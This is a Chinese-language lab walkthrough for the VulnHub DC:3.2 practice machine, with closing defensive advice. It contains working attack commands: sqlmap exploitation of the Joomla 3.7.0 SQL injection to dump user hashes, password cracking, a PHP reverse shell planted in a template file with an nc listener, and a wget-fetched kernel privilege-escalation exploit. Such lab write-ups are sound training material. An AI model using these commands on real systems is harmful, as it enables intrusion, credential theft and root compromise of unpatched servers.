DC:3.2
字数 1240 2025-08-19 12:42:07
DC:3.2 靶机渗透测试教学文档
一、环境准备
靶机信息
- 名称: DC:3.2
- 下载地址: https://www.vulnhub.com/entry/dc-32,312/
- 默认IP: 192.168.44.135 (可能需根据实际网络环境调整)
攻击机配置
- 推荐IP: 192.168.44.133
- 所需工具:
- nmap/arp-scan
- sqlmap
- John the Ripper
- netcat
- Python
二、信息收集阶段
1. 主机发现
nmap -sn 192.168.44.0/24
# 或
arp-scan -I eth0 -l
2. 端口扫描
nmap -sV -p- 192.168.44.135
发现结果:
- 开放端口: 80 (Apache/2.4.18)
- 内核版本范围: 3.2-4.9
3. Web目录扫描
使用工具如dirb、gobuster或dirsearch:
gobuster dir -u http://192.168.44.135 -w /path/to/wordlist.txt
重要发现:
/administrator/index.php: Joomla后台登录页面/readme.txt: 显示Joomla版本为3.7.0
三、漏洞利用阶段
1. Joomla 3.7.0 SQL注入漏洞利用
漏洞参考:
安全客-Joomla!3.7.0 SQL注入漏洞分析
使用sqlmap进行利用:
sqlmap -u "http://192.168.44.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --technique=U --dbms=mysql --batch --dbs
关键点:
- 表名中包含星号(*)时需要转义或引号包裹
- 获取用户表数据:
sqlmap -u "http://192.168.44.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" -C username,password --dump
2. 密码破解
使用John the Ripper破解获取的哈希:
john --wordlist=/path/to/wordlist.txt hash.txt
破解结果: 密码为"snoopy"
3. 后台登录与Webshell上传
- 访问
/administrator/index.php使用获取的凭据登录 - 导航至: Extensions > Templates > Beez3
- 编辑
error.php文件,插入PHP反向shell代码- 可使用
/usr/share/webshells/php/php_reverse.php - 修改监听IP和端口
- 可使用
4. 获取反向Shell
- 在攻击机启动监听:
nc -lvnp 4444
- 访问包含webshell的页面触发连接
5. 交互式Shell升级
python -c 'import pty;pty.spawn("/bin/bash")'
四、权限提升阶段
1. 初始提权尝试
sudo -l # 需要密码
uname -a # 查看内核版本
2. 内核漏洞利用
发现39772.txt文件,内容提示:
- 存在可利用的内核漏洞
- 成功执行可在60秒内获取root权限
利用步骤:
- 在攻击机启动Python HTTP服务:
python2 -m SimpleHTTPServer 8000
- 在目标机下载利用程序:
cd /tmp
wget http://192.168.44.133:8000/39772.zip
- 解压并编译:
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
3. 获取flag
成功提权后:
cat /root/flag
五、关键知识点总结
-
信息收集:
- 主机发现与端口扫描是渗透测试基础
- Web目录扫描可发现隐藏资源
- 版本信息泄露是常见漏洞来源
-
漏洞利用:
- 已知CMS版本应立即搜索相关漏洞
- SQL注入利用需注意特殊字符处理
- 密码破解是常见提权手段
-
权限提升:
- 内核漏洞是Linux系统常见提权方式
- 利用文件传输技巧克服环境限制
- 编译型漏洞利用需注意目标环境兼容性
-
后渗透:
- 交互式shell提升操作便利性
- 系统信息收集为后续攻击提供方向
六、防御建议
- 及时更新CMS系统和插件
- 使用强密码策略
- 限制后台文件修改权限
- 定期更新操作系统内核
- 实施最小权限原则
- 监控系统日志和异常行为